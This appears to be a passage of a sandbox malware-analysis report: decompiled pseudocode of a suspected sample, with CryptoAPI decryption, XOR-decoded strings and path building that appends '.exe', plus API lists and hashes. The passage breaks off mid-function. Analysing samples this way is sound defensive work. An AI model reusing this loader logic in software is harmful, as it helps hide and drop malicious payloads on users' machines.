										__eflags = _t106 + _t151 - _t138;
										if(_t106 + _t151 >= _t138) {
											_t117 = _t132;
											_v156 = 1;
										}
										_v144 = _t117;
										E004104C0(_v168, _t151, _t117);
										_t159 = _t159 + 0xc;
										__eflags = CryptDecrypt(_v152, 0, _v156, 0, _v168,  &_v144);
										if(__eflags == 0) {
											goto L15;
										}
										E004104C0( *_v176 + _t145, _v168, _v144);
										_t145 = _t145 + _v144;
										_t159 = _t159 + 0xc;
										__eflags = _t117 - 0xa0;
										if(__eflags == 0) {
											_t151 = _t151 + _t117;
											_t140 = _v160 + 1;
											_t106 = _v180;
											_t132 = _v164 - _t117;
											__eflags = _t140 - _v172;
											_v160 = _t140;
											_t138 = _v172;
											_v164 = _t132;
											if(__eflags < 0) {
												continue;
											}
										}
										goto L15;
									}
								}
								L15:
								CryptDestroyKey(_v152);
							} else {
								goto L7;
							}
						} else {
							GetLastError();
							_t145 = _t149 | 0xffffffff;
						}
					}
				}
				_t135 = _a28;
				if(_t135 < 0x10) {
					L20:
					 *[fs:0x0] = _v16;
					_pop(_t146);
					_pop(_t152);
					_pop(_t118);
					return E0040EBBF(_t145, _t118, _v24 ^ _t155, _t135, _t146, _t152);
				} else {
					_t126 = _a8;
					_t135 = _t135 + 1;
					_t82 = _t126;
					if(_t135 < 0x1000) {
						L19:
						_push(_t135);
						E0040EDFF(_t126);
						goto L20;
					} else {
						_t126 =  *((intOrPtr*)(_t126 - 4));
						_t135 = _t135 + 0x23;
						if(_t82 - _t126 + 0xfffffffc > 0x1f) {
							E00413527(_t117, _t135, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t155);
							_push(_t151);
							_t153 = _t126;
							asm("xorps xmm0, xmm0");
							 *_t153 = 0x42e2d4;
							asm("movq [eax], xmm0");
							__eflags = _v220 + 4;
							E0040FF71(_v220 + 4, _t153 + 4);
							 *_t153 = 0x42e320;
							return _t153;
						} else {
							goto L19;
						}
					}
				}
			}

0x00403787
0x0040378c
0x0040378e
0x00403798
0x0040379e
0x004037a0
0x004037a6
0x004037af
0x004037b5
0x004037cc
0x004037d6
0x004037ed
0x004037ed
0x004037f0
0x004037f8
0x004038ba
0x004038c8
0x004038ca
0x004037fe
0x004037fe
0x00403814
0x0040381c
0x00000000
0x00403822
0x00403829
0x0040382d
0x0040382f
0x00403835
0x00403838
0x00403838
0x0040383a
0x0040383b
0x0040383b
0x00403846
0x0040385d
0x00403867
0x0040386c
0x0040387e
0x00403886
0x00403896
0x004038b0
0x004038b6
0x004038b8
0x004038d5
0x004038d6
0x004038de
0x004038e8
0x004038f5
0x004038fa
0x00403900
0x00403902
0x00403905
0x0040390b
0x00403915
0x0040391f
0x00403925
0x00403927
0x00403932
0x00403934
0x00403934
0x00403936
0x0040393c
0x00403942
0x00403944
0x00403949
0x0040394b
0x0040394d
0x0040394f
0x0040394f
0x00403961
0x00403967
0x0040396c
0x00403992
0x00403994
0x00000000
0x00000000
0x004039ad
0x004039b2
0x004039b8
0x004039bb
0x004039c1
0x004039c9
0x004039d1
0x004039d2
0x004039d8
0x004039da
0x004039e0
0x004039e6
0x004039ec
0x004039f2
0x00000000
0x00000000
0x004039f2
0x00000000
0x004039c1
0x00403942
0x004039f8
0x004039fe
0x00000000
0x00000000
0x00000000
0x00403888
0x00403888
0x0040388e
0x0040388e
0x00403886
0x0040381c
0x00403a04
0x00403a0a
0x00403a34
0x00403a39
0x00403a41
0x00403a42
0x00403a43
0x00403a51
0x00403a0c
0x00403a0c
0x00403a0f
0x00403a10
0x00403a18
0x00403a2a
0x00403a2a
0x00403a2c
0x00000000
0x00403a1a
0x00403a1a
0x00403a1d
0x00403a28
0x00403a52
0x00403a57
0x00403a58
0x00403a59
0x00403a5a
0x00403a5b
0x00403a5c
0x00403a5d
0x00403a5e
0x00403a5f
0x00403a60
0x00403a63
0x00403a64
0x00403a66
0x00403a6d
0x00403a73
0x00403a7a
0x00403a7e
0x00403a86
0x00403a90
0x00000000
0x00000000
0x00000000
0x00403a28
0x00403a18

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,7BD02EAD), ref: 004037F0
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
_mbstowcs.LIBCMT ref: 00403867
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
GetLastError.KERNEL32 ref: 00403888
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004038B0
GetLastError.KERNEL32 ref: 004038BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004038CA
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 0040398C
CryptDestroyKey.ADVAPI32(?), ref: 004039FE
___std_exception_copy.LIBVCRUNTIME ref: 00403A7E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 004037CC, 00403A63

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 4265767208-63410773
Opcode ID: cf61a024e7b059b9c70e00f8277d4a847d871fa60616db5b4861065f2fd07a60
Instruction ID: d958dc93e540a12c37dba8d87c44a8e8f394457365b2a07e5a0a794f231eaf70
Opcode Fuzzy Hash: cf61a024e7b059b9c70e00f8277d4a847d871fa60616db5b4861065f2fd07a60
Instruction Fuzzy Hash: 2881A071B00228AFEB209F25CC41B9ABBB9FF45304F4081AAF54DE7281DB759E858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 20.6, APIs: 6, Strings: 5, Instructions: 1319
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00406AA0(void* __ebx, long __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				signed char _v16;
				char _v20;
				signed int _v24;
				short _v28;
				signed int _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v300;
				signed char _v304;
				signed char _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				signed char _v324;
				long _v328;
				signed char _v332;
				char _v348;
				long _v352;
				signed char _v356;
				char _v372;
				long _v376;
				signed char _v380;
				signed char _v396;
				char _v400;
				char _v401;
				long _v408;
				signed char _v412;
				signed char _v428;
				long _v432;
				signed char _v436;
				signed char _v452;
				long _v456;
				signed char _v460;
				char _v476;
				signed char _v496;
				char _v504;
				signed int _v508;
				char _v760;
				char _v1088;
				signed char _v1092;
				intOrPtr _v1096;
				signed int _v1100;
				intOrPtr _v1104;
				char _v1128;
				char _v1152;
				char _v1176;
				char _v1200;
				char _v1224;
				char _v1248;
				char _v1272;
				signed int _v1772;
				short _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				void* __ebp;
				signed int _t796;
				signed int _t797;
				void* _t799;
				signed int _t801;
				intOrPtr _t805;
				signed char _t806;
				signed int _t807;
				char* _t811;
				void* _t813;
				signed int _t819;
				intOrPtr _t820;
				signed int _t821;
				char* _t825;
				void* _t827;
				signed int _t833;
				intOrPtr _t834;
				signed char _t835;
				signed int _t836;
				char* _t840;
				void* _t842;
				signed int _t848;
				void* _t855;
				char* _t856;
				intOrPtr _t863;
				signed int _t870;
				signed int _t871;
				signed int _t873;
				void* _t877;
				void* _t880;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				void* _t886;
				void* _t895;
				signed int _t896;
				signed int _t899;
				signed int _t905;
				void* _t911;
				void* _t912;
				signed int _t914;
				void* _t919;
				void* _t923;
				void* _t924;
				signed int _t926;
				signed int _t930;
				intOrPtr _t933;
				signed int _t942;
				void* _t943;
				signed char _t946;
				char* _t950;
				intOrPtr _t951;
				signed char _t955;
				signed int _t958;
				signed int _t960;
				char _t964;
				signed char _t965;
				signed char _t969;
				intOrPtr _t973;
				signed int _t980;
				void* _t985;
				char* _t986;
				signed char _t990;
				intOrPtr _t994;
				intOrPtr _t998;
				signed char _t1002;
				intOrPtr _t1006;
				char _t1011;
				signed char _t1012;
				signed char _t1016;
				intOrPtr _t1020;
				signed int _t1027;
				void* _t1034;
				char* _t1035;
				intOrPtr _t1039;
				intOrPtr _t1043;
				signed char _t1047;
				intOrPtr _t1051;
				char _t1056;
				signed char _t1057;
				signed char _t1061;
				intOrPtr _t1065;
				char* _t1077;
				signed int _t1079;
				signed int _t1082;
				void* _t1085;
				void* _t1086;
				void* _t1092;
				intOrPtr _t1094;
				signed char _t1095;
				signed int _t1096;
				char* _t1100;
				void* _t1102;
				signed int _t1108;
				intOrPtr _t1109;
				signed int _t1110;
				char* _t1114;
				void* _t1116;
				signed int _t1122;
				intOrPtr _t1123;
				signed char _t1124;
				signed int _t1125;
				char* _t1129;
				void* _t1131;
				signed int _t1137;
				intOrPtr _t1138;
				intOrPtr _t1142;
				void* _t1146;
				char* _t1147;
				intOrPtr _t1151;
				intOrPtr _t1155;
				signed char _t1159;
				intOrPtr _t1163;
				char _t1168;
				signed char _t1169;
				signed char _t1173;
				intOrPtr _t1177;
				signed int _t1184;
				void* _t1189;
				char* _t1190;
				intOrPtr _t1194;
				intOrPtr _t1197;
				signed char _t1201;
				intOrPtr _t1205;
				char _t1210;
				signed char _t1211;
				signed char _t1215;
				intOrPtr _t1219;
				signed int _t1226;
				void* _t1233;
				char* _t1234;
				intOrPtr _t1238;
				intOrPtr _t1241;
				signed char _t1245;
				signed char _t1249;
				char _t1254;
				signed char _t1255;
				signed char _t1259;
				signed char _t1263;
				void* _t1275;
				char* _t1276;
				intOrPtr _t1280;
				intOrPtr _t1283;
				signed char _t1287;
				signed char _t1291;
				char _t1296;
				intOrPtr _t1297;
				signed char _t1302;
				intOrPtr _t1306;
				void* _t1309;
				intOrPtr* _t1318;
				signed char _t1321;
				void* _t1326;
				intOrPtr* _t1327;
				signed char _t1330;
				void* _t1335;
				signed char* _t1336;
				signed char _t1339;
				void* _t1344;
				char* _t1356;
				long _t1407;
				signed int _t1425;
				signed char _t1427;
				signed char _t1428;
				char _t1429;
				char* _t1434;
				signed char _t1435;
				char _t1436;
				char _t1437;
				signed char _t1438;
				char _t1439;
				signed char _t1440;
				signed char _t1441;
				char _t1442;
				char* _t1446;
				char _t1447;
				char _t1448;
				signed char _t1449;
				char _t1450;
				signed char _t1451;
				signed char _t1452;
				char _t1453;
				intOrPtr* _t1454;
				signed int _t1455;
				char* _t1459;
				void* _t1465;
				intOrPtr* _t1466;
				signed char _t1469;
				void* _t1474;
				intOrPtr* _t1475;
				signed char _t1478;
				void* _t1483;
				signed char* _t1484;
				signed char _t1487;
				void* _t1492;
				char _t1493;
				char _t1494;
				char* _t1498;
				char _t1499;
				char _t1500;
				signed char _t1501;
				char _t1502;
				signed char _t1503;
				signed char _t1504;
				char _t1505;
				char* _t1510;
				char _t1511;
				signed char _t1512;
				intOrPtr _t1513;
				signed char _t1514;
				signed char _t1515;
				intOrPtr _t1516;
				char* _t1520;
				char _t1521;
				signed char _t1522;
				signed char _t1523;
				signed char _t1524;
				signed char _t1525;
				signed char _t1526;
				char* _t1530;
				intOrPtr _t1531;
				signed char _t1532;
				signed char _t1533;
				intOrPtr _t1534;
				signed char _t1535;
				intOrPtr* _t1536;
				void* _t1540;
				long _t1541;
				long _t1543;
				long _t1544;
				long _t1545;
				void* _t1546;
				long _t1547;
				long _t1549;
				long _t1550;
				long _t1551;
				signed char* _t1552;
				long _t1553;
				long _t1555;
				long _t1556;
				signed char _t1560;
				void* _t1578;
				void* _t1579;
				signed char _t1582;
				long _t1583;
				long _t1584;
				long _t1585;
				long _t1586;
				void* _t1587;
				void* _t1588;
				void* _t1589;
				void* _t1590;
				void* _t1591;
				void* _t1592;
				signed char _t1595;
				long _t1596;
				long _t1597;
				long _t1598;
				long _t1599;
				void* _t1600;
				void* _t1601;
				void* _t1602;
				void* _t1603;
				void* _t1604;
				void* _t1605;
				intOrPtr* _t1606;
				long _t1611;
				long _t1612;
				void* _t1613;
				signed char _t1614;
				long _t1616;
				long _t1617;
				signed char _t1618;
				void* _t1619;
				long _t1620;
				long _t1622;
				long _t1623;
				long _t1624;
				signed char* _t1625;
				long _t1626;
				long _t1628;
				long _t1629;
				long _t1630;
				long _t1631;
				void* _t1632;
				signed char _t1635;
				long _t1636;
				long _t1637;
				long _t1638;
				long _t1639;
				void* _t1640;
				void* _t1641;
				void* _t1642;
				void* _t1643;
				void* _t1644;
				void* _t1645;
				signed char _t1648;
				long _t1649;
				long _t1650;
				long _t1651;
				long _t1652;
				void* _t1653;
				void* _t1654;
				void* _t1655;
				void* _t1656;
				void* _t1657;
				signed char _t1660;
				long _t1661;
				long _t1662;
				long _t1663;
				long _t1664;
				void* _t1665;
				void* _t1666;
				void* _t1667;
				void* _t1668;
				void* _t1669;
				signed char _t1672;
				long _t1673;
				long _t1674;
				long _t1675;
				long _t1676;
				void* _t1677;
				void* _t1678;
				void* _t1679;
				void* _t1680;
				void* _t1681;
				long _t1683;
				void* _t1684;
				long _t1688;
				void* _t1689;
				signed int _t1692;
				signed int _t1698;
				signed int _t1700;
				signed int _t1701;
				void* _t1703;
				signed int _t1706;
				void* _t1707;
				void* _t1708;
				signed char _t1709;
				void* _t1710;
				void* _t1711;
				void* _t1712;
				signed char _t1713;
				void* _t1714;
				void* _t1715;
				signed int _t1716;
				signed char _t1717;
				void* _t1718;
				void* _t1719;
				void* _t1724;
				void* _t1730;
				void* _t1731;
				signed int _t1732;
				void* _t1738;
				char _t1747;
				void* _t1748;
				void* _t1749;
				signed char _t1750;
				void* _t1751;
				void* _t1752;
				signed char _t1753;
				void* _t1754;
				void* _t1755;
				signed char _t1756;
				void* _t1757;

				_push(__ebx);
				_t1309 = _t1703;
				_t1706 = (_t1703 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t1309 + 4));
				_t1698 = _t1706;
				_push(0xffffffff);
				_push(0x42c942);
				_push( *[fs:0x0]);
				_push(_t1309);
				_t1707 = _t1706 - 0x1c0;
				_t796 =  *0x43d054; // 0x7bd02ead
				_t797 = _t796 ^ _t1698;
				_v32 = _t797;
				_push(__esi);
				_push(__edi);
				_push(_t797);
				 *[fs:0x0] =  &_v24;
				_t1688 = __ecx;
				_v400 = __ecx;
				_v400 = __ecx;
				_v396 = 0;
				_v380 = 0;
				_v376 = 0xf;
				_v396 = 0;
				_v16 = 0;
				_t799 = E004065E0(__ecx); // executed
				if(_t799 != 0) {
					E00406760(_t1309,  &_v348, __edi);
					_v16 = 0x16;
					_t801 = E00417DF6( &_v348, __eflags);
					asm("cdq");
					E004055C0( &_v372, _t801 % 0xa + 5);
					_v16 = 0x17;
					_v401 = 0x2e;
					_t1683 =  *( *[fs:0x2c]);
					_t805 =  *0x450f24; // 0x0
					__eflags = _t805 -  *((intOrPtr*)(_t1683 + 4));
					if(_t805 >  *((intOrPtr*)(_t1683 + 4))) {
						E0040EF48(_t805, 0x450f24);
						_t1707 = _t1707 + 4;
						__eflags =  *0x450f24 - 0xffffffff;
						if(__eflags == 0) {
							asm("movaps xmm0, [0x439d90]");
							asm("movups [0x450e90], xmm0");
							 *0x450ea0 = _v401;
							E0040F25B( &_v372, __eflags, 0x42d010);
							E0040EEFE(0x450f24);
							_t1707 = _t1707 + 8;
						}
					}
					_t806 =  *0x450ea0; // 0x0
					__eflags = _t806;
					if(_t806 != 0) {
						asm("movups xmm0, [0x450e90]");
						asm("movaps xmm1, [0x439d30]");
						asm("pxor xmm1, xmm0");
						 *0x450ea0 = _t806 ^ 0x0000002e;
						asm("movups [0x450e90], xmm1");
					}
					_t1318 = 0x450e90;
					_v452 = 0;
					_v436 = 0;
					_v432 = 0xf;
					_v452 = 0;
					_t408 = _t1318 + 1; // 0x450e91
					_t1540 = _t408;
					do {
						_t807 =  *_t1318;
						_t1318 = _t1318 + 1;
						__eflags = _t807;
					} while (_t807 != 0);
					E004026B0(_t1309,  &_v452, 0x450e90, _t1318 - _t1540);
					_v16 = 0x18;
					_t1541 = _v432;
					_t1321 = _v436;
					__eflags = _t1541 - _t1321 - 1;
					if(_t1541 - _t1321 < 1) {
						_v400 = 0;
						_t811 = E00402980(_t1309,  &_v452, _t1683, _t1688, 1, _v400, "\\", 1);
					} else {
						_t413 =  &(1[_t1321]); // 0x1
						__eflags = _t1541 - 0x10;
						_v436 = _t413;
						_t1071 =  >=  ? _v452 :  &_v452;
						 *((short*)(( >=  ? _v452 :  &_v452) + _t1321)) = 0x5c;
						_t811 =  &_v452;
					}
					_v428 = 0;
					_v412 = 0;
					_v408 = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ebp-0x1a0], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ebp-0x190], xmm0");
					 *(_t811 + 0x10) = 0;
					 *(_t811 + 0x14) = 0xf;
					 *_t811 = 0;
					_v16 = 0x19;
					_t813 = E0040C990( &_v476,  &_v428,  &_v348);
					_t1708 = _t1707 + 4;
					E00402490(_t1309,  &_v396, _t813);
					_t1543 = _v456;
					__eflags = _t1543 - 0x10;
					if(_t1543 < 0x10) {
						L198:
						_v16 = 0x18;
						_t1544 = _v408;
						_v460 = 0;
						_v456 = 0xf;
						_v476 = 0;
						__eflags = _t1544 - 0x10;
						if(_t1544 < 0x10) {
							L202:
							_v16 = 0x17;
							_t1545 = _v432;
							_v412 = 0;
							_v408 = 0xf;
							_v428 = 0;
							__eflags = _t1545 - 0x10;
							if(_t1545 < 0x10) {
								L206:
								_t1709 = _t1708 - 0x18;
								_v304 = _t1709;
								E0040BB90(_t1309, _t1709, _t1545, _t1683,  &_v372);
								_t1710 = _t1709 - 0x18;
								_v16 = 0x1a;
								_t1326 = _t1710;
								E0040BB90(_t1309, _t1326, _t1545, _t1683,  &_v396);
								_v16 = 0x17;
								_t819 = E00406800(_t1309, _t1326, _t1683, _t1688);
								_t1711 = _t1710 + 0x30;
								__eflags = _t819;
								if(_t819 == 0) {
									_t820 =  *0x450f8c; // 0x0
									_v316 = 0x7e72146d;
									_v312 = 0x5c49415c;
									_v308 = 0x4f6a434f;
									_v304 = 0x4f5a;
									_v401 = 0x2e;
									__eflags = _t820 -  *((intOrPtr*)(_t1683 + 4));
									if(_t820 >  *((intOrPtr*)(_t1683 + 4))) {
										E0040EF48(_t820, 0x450f8c);
										_t1711 = _t1711 + 4;
										__eflags =  *0x450f8c - 0xffffffff;
										if(__eflags == 0) {
											asm("movq xmm0, [ebp-0x130]");
											 *0x450d6c = _v308;
											 *0x450d70 = _v304;
											asm("movq [0x450d64], xmm0");
											 *0x450d72 = _v401;
											E0040F25B(_t1326, __eflags, 0x42cfe0);
											E0040EEFE(0x450f8c);
											_t1711 = _t1711 + 8;
										}
									}
									__eflags =  *0x450d72;
									if( *0x450d72 != 0) {
										_t1027 = 0;
										__eflags = 0;
										do {
											 *(_t1027 + 0x450d64) =  *(_t1027 + 0x450d64) ^ 0x0000002e;
											_t1027 = _t1027 + 1;
											__eflags = _t1027 - 0xf;
										} while (_t1027 < 0xf);
									}
									_t1327 = 0x450d64;
									_v452 = 0;
									_v436 = 0;
									_v432 = 0xf;
									_v452 = 0;
									_t512 = _t1327 + 1; // 0x450d65
									_t1546 = _t512;
									asm("o16 nop [eax+eax]");
									do {
										_t821 =  *_t1327;
										_t1327 = _t1327 + 1;
										__eflags = _t821;
									} while (_t821 != 0);
									E004026B0(_t1309,  &_v452, 0x450d64, _t1327 - _t1546);
									_v16 = 0x1d;
									_t1547 = _v432;
									_t1330 = _v436;
									__eflags = _t1547 - _t1330 - 1;
									if(_t1547 - _t1330 < 1) {
										_v400 = 0;
										_t825 = E00402980(_t1309,  &_v452, _t1683, _t1688, 1, _v400, "\\", 1);
									} else {
										_t517 =  &(1[_t1330]); // 0x1
										__eflags = _t1547 - 0x10;
										_v436 = _t517;
										_t1026 =  >=  ? _v452 :  &_v452;
										 *((short*)(( >=  ? _v452 :  &_v452) + _t1330)) = 0x5c;
										_t825 =  &_v452;
									}
									_v428 = 0;
									_v412 = 0;
									_v408 = 0;
									asm("movups xmm0, [eax]");
									asm("movups [ebp-0x1a0], xmm0");
									asm("movq xmm0, [eax+0x10]");
									asm("movq [ebp-0x190], xmm0");
									 *(_t825 + 0x10) = 0;
									 *(_t825 + 0x14) = 0xf;
									 *_t825 = 0;
									_v16 = 0x1e;
									_t827 = E0040C990( &_v476,  &_v428,  &_v348);
									_t1712 = _t1711 + 4;
									E00402490(_t1309,  &_v396, _t827);
									_t1549 = _v456;
									__eflags = _t1549 - 0x10;
									if(_t1549 < 0x10) {
										L244:
										_v16 = 0x1d;
										_t1550 = _v408;
										_v460 = 0;
										_v456 = 0xf;
										_v476 = 0;
										__eflags = _t1550 - 0x10;
										if(_t1550 < 0x10) {
											L248:
											_v16 = 0x17;
											_t1551 = _v432;
											_v412 = 0;
											_v408 = 0xf;
											_v428 = 0;
											__eflags = _t1551 - 0x10;
											if(_t1551 < 0x10) {
												L252:
												_t1713 = _t1712 - 0x18;
												_v304 = _t1713;
												E0040BB90(_t1309, _t1713, _t1551, _t1683,  &_v372);
												_t1714 = _t1713 - 0x18;
												_v16 = 0x1f;
												_t1335 = _t1714;
												E0040BB90(_t1309, _t1335, _t1551, _t1683,  &_v396);
												_v16 = 0x17;
												_t833 = E00406800(_t1309, _t1335, _t1683, _t1688);
												_t1715 = _t1714 + 0x30;
												__eflags = _t833;
												if(_t833 == 0) {
													_t834 =  *0x450dd0; // 0x0
													_v308 = 0x7a72146d;
													_v304 = 0x2e5e434b;
													__eflags = _t834 -  *((intOrPtr*)(_t1683 + 4));
													if(_t834 >  *((intOrPtr*)(_t1683 + 4))) {
														E0040EF48(_t834, 0x450dd0);
														_t1715 = _t1715 + 4;
														__eflags =  *0x450dd0 - 0xffffffff;
														if(__eflags == 0) {
															 *0x450d84 = _v308;
															 *0x450d88 = _v304;
															E0040F25B(_v304, __eflags, 0x42cfd0);
															E0040EEFE(0x450dd0);
															_t1715 = _t1715 + 8;
														}
													}
													_t835 =  *0x450d8b; // 0x0
													__eflags = _t835;
													if(_t835 != 0) {
														 *0x450d84 =  *0x450d84 ^ 0x0000002e;
														 *0x450d85 =  *0x450d85 ^ 0x0000002e;
														 *0x450d86 =  *0x450d86 ^ 0x0000002e;
														 *0x450d87 =  *0x450d87 ^ 0x0000002e;
														 *0x450d88 =  *0x450d88 ^ 0x0000002e;
														 *0x450d89 =  *0x450d89 ^ 0x0000002e;
														 *0x450d8a =  *0x450d8a ^ 0x0000002e;
														_t980 = _t835 ^ 0x0000002e;
														__eflags = _t980;
														 *0x450d8b = _t980;
													}
													_t1336 = 0x450d84;
													_v452 = 0;
													_v436 = 0;
													_v432 = 0xf;
													_v452 = 0;
													_t610 =  &(_t1336[1]); // 0x450d85
													_t1552 = _t610;
													do {
														_t836 =  *_t1336;
														_t1336 =  &(_t1336[1]);
														__eflags = _t836;
													} while (_t836 != 0);
													E004026B0(_t1309,  &_v452, 0x450d84, _t1336 - _t1552);
													_v16 = 0x22;
													_t1553 = _v432;
													_t1339 = _v436;
													__eflags = _t1553 - _t1339 - 1;
													if(_t1553 - _t1339 < 1) {
														_v400 = 0;
														_t840 = E00402980(_t1309,  &_v452, _t1683, _t1688, 1, _v400, "\\", 1);
													} else {
														_t615 =  &(1[_t1339]); // 0x1
														__eflags = _t1553 - 0x10;
														_v436 = _t615;
														_t979 =  >=  ? _v452 :  &_v452;
														 *((short*)(( >=  ? _v452 :  &_v452) + _t1339)) = 0x5c;
														_t840 =  &_v452;
													}
													_v428 = 0;
													_v412 = 0;
													_v408 = 0;
													asm("movups xmm0, [eax]");
													asm("movups [ebp-0x1a0], xmm0");
													asm("movq xmm0, [eax+0x10]");
													asm("movq [ebp-0x190], xmm0");
													 *(_t840 + 0x10) = 0;
													 *(_t840 + 0x14) = 0xf;
													 *_t840 = 0;
													_v16 = 0x23;
													_t842 = E0040C990( &_v476,  &_v428,  &_v348);
													_t1716 = _t1715 + 4;
													E00402490(_t1309,  &_v396, _t842);
													_t1555 = _v456;
													__eflags = _t1555 - 0x10;
													if(_t1555 < 0x10) {
														L289:
														_v16 = 0x22;
														_t1556 = _v408;
														_v460 = 0;
														_v456 = 0xf;
														_v476 = 0;
														__eflags = _t1556 - 0x10;
														if(_t1556 < 0x10) {
															L293:
															_v16 = 0x17;
															_t1557 = _v432;
															_v412 = 0;
															_v408 = 0xf;
															_v428 = 0;
															__eflags = _t1557 - 0x10;
															if(_t1557 < 0x10) {
																L297:
																_t1717 = _t1716 - 0x18;
																_v304 = _t1717;
																E0040BB90(_t1309, _t1717, _t1557, _t1683,  &_v372);
																_t1718 = _t1717 - 0x18;
																_v16 = 0x24;
																_t1344 = _t1718;
																E0040BB90(_t1309, _t1344, _t1557, _t1683,  &_v396);
																_v16 = 0x17;
																_t848 = E00406800(_t1309, _t1344, _t1683, _t1688);
																_t1719 = _t1718 + 0x30;
																__eflags = _t848;
																if(_t848 == 0) {
																	E00402440(_t1309,  &_v372);
																	_v16 = 0;
																	E00402440(_t1309,  &_v348);
																	goto L309;
																} else {
																	_push(_t1344);
																	_t855 = E0040C770( &_v428,  &_v396);
																	_v16 = 0x25;
																	_t856 = E0040C990( &_v476, _t855,  &_v372);
																	_t1716 = _t1719 + 8;
																	_t1356 = _t856;
																	_v16 = 0x26;
																	_t1683 =  *(_t1356 + 0x14);
																	_t1560 =  *(_t1356 + 0x10);
																	__eflags = _t1683 - _t1560 - 4;
																	if(_t1683 - _t1560 < 4) {
																		_v400 = 0;
																		_t1356 = E00402980(_t1309, _t1356, _t1683, _t1688, 4, _v400, ".exe", 4);
																	} else {
																		 *(_t1356 + 0x10) = _t1560 + 4;
																		_t964 = _t1356;
																		__eflags = _t1683 - 0x10;
																		if(_t1683 >= 0x10) {
																			_t964 =  *_t1356;
																		}
																		 *((intOrPtr*)(_t964 + _t1560)) = 0x6578652e;
																		 *((char*)(_t964 + _t1560 + 4)) = 0;
																	}
																	 *_t1688 = 0;
																	 *(_t1688 + 0x10) = 0;
																	 *(_t1688 + 0x14) = 0;
																	asm("movups xmm0, [ecx]");
																	asm("movups [esi], xmm0");
																	asm("movq xmm0, [ecx+0x10]");
																	asm("movq [esi+0x10], xmm0");
																	 *(_t1356 + 0x10) = 0;
																	 *(_t1356 + 0x14) = 0xf;
																	 *_t1356 = 0;
																	_t1557 = _v456;
																	__eflags = _t1557 - 0x10;
																	if(_t1557 < 0x10) {
																		L307:
																		_v460 = 0;
																		_v456 = 0xf;
																		_v476 = 0;
																		E00402440(_t1309,  &_v428);
																		E00402440(_t1309,  &_v372);
																		E00402440(_t1309,  &_v348);
																		goto L310;
																	} else {
																		_t1360 = _v476;
																		_t1557 =  &(1[_t1557]);
																		_t863 = _t1360;
																		__eflags = _t1557 - 0x1000;
																		if(_t1557 < 0x1000) {
																			L306:
																			_push(_t1557);
																			E0040EDFF(_t1360);
																			goto L307;
																		} else {
																			_t1360 =  *((intOrPtr*)(_t1360 - 4));
																			_t1557 = _t1557 + 0x23;
																			__eflags = _t863 - _t1360 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L313;
																			} else {
																				goto L306;
																			}
																		}
																	}
																}
															} else {
																_t1427 = _v452;
																_t1557 =  &(1[_t1557]);
																_t965 = _t1427;
																__eflags = _t1557 - 0x1000;
																if(_t1557 < 0x1000) {
																	L296:
																	_push(_t1557);
																	E0040EDFF(_t1427);
																	_t1716 = _t1716 + 8;
																	goto L297;
																} else {
																	_t1360 =  *((intOrPtr*)(_t1427 - 4));
																	_t1557 = _t1557 + 0x23;
																	__eflags = _t965 -  *((intOrPtr*)(_t1427 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L313;
																	} else {
																		goto L296;
																	}
																}
															}
														} else {
															_t1428 = _v428;
															_t1578 = _t1556 + 1;
															_t969 = _t1428;
															__eflags = _t1578 - 0x1000;
															if(_t1578 < 0x1000) {
																L292:
																_push(_t1578);
																E0040EDFF(_t1428);
																_t1716 = _t1716 + 8;
																goto L293;
															} else {
																_t1360 =  *((intOrPtr*)(_t1428 - 4));
																_t1557 = _t1578 + 0x23;
																__eflags = _t969 -  *((intOrPtr*)(_t1428 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L292;
																}
															}
														}
													} else {
														_t1429 = _v476;
														_t1579 = _t1555 + 1;
														_t973 = _t1429;
														__eflags = _t1579 - 0x1000;
														if(_t1579 < 0x1000) {
															L288:
															_push(_t1579);
															E0040EDFF(_t1429);
															_t1716 = _t1716 + 8;
															goto L289;
														} else {
															_t1360 =  *((intOrPtr*)(_t1429 - 4));
															_t1557 = _t1579 + 0x23;
															__eflags = _t973 -  *((intOrPtr*)(_t1429 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L288;
															}
														}
													}
												} else {
													_push(_t1335);
													_t985 = E0040C770( &_v428,  &_v396);
													_v16 = 0x20;
													_t986 = E0040C990( &_v476, _t985,  &_v372);
													_t1716 = _t1715 + 8;
													_t1434 = _t986;
													_v16 = 0x21;
													_t1683 =  *(_t1434 + 0x14);
													_t1582 =  *(_t1434 + 0x10);
													__eflags = _t1683 - _t1582 - 4;
													if(_t1683 - _t1582 < 4) {
														_v400 = 0;
